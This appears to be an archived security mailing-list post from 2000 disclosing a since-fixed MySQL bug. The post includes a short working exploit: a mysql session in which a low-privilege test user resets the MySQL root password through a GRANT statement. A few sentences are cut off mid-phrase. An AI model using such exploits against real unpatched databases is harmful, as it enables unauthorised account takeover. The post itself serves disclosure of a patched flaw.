Re: Serious bug in MySQL password handling.

From: Viktor Fougstedt (viktorat_private)
Date: Mon Feb 14 2000 - 12:19:17 PST

  • Next message: monti: "Re: FireWall-1 FTP Server Vulnerability"

    As I posted to bugtraq a few weeks ago, I discovered a serious bug in
    MySQL:s password handling, affecting versions 3.22.29 and earlier, and
    3.23.8 and earlier.
    As promised in that post, I now post an exploit, since all serious
    admins should have upgraded by now, especially with the
    password-checking bug found recently by Robert van der Meulen.
    Note that the bug which the code in this post exploits is fixed in
    3.22.30 and later, as well as 3.23.10 and later. No current MySQL
    is vulnerable to this exploit.
    The old problem was simply that any user could alter any password in
    the system using the GRANT statement.
    Exploit: Connect to mysql as any user with grant privileges for any
    table. The default test users will do nicely. If no databases has been
    created for the test user, do so. Then alter roots (MySQL's roots, not
    the real roots!) password with a GRANT. After the code below has been
    executed, the password of the MySQL superuser 'root' will be
    > mysql -utest -p
    mysql> CREATE DATABASE test_expl;
    Query OK, 1 row affected (0.04 sec)
    mysql> GRANT select ON test_expl.* TO root@localhost IDENTIFIED BY 'newpassword';
    Query OK, 0 rows affected (0.01 sec)
    mysql> exit
    The problem was quickly fixed, and I got good response from the people
    at TCX Datakonsult AB (thanks Monty!). I warmly recommend MySQL to
    This message is not CC:ed to the mysql-list, as an exploit has already
    been posted there.
    --|     Viktor Fougstedt, system administrator at     |--
    --|                      |--
    --| ...soon we'll be sliding down the razor blade of life. /Tom Lehrer |--

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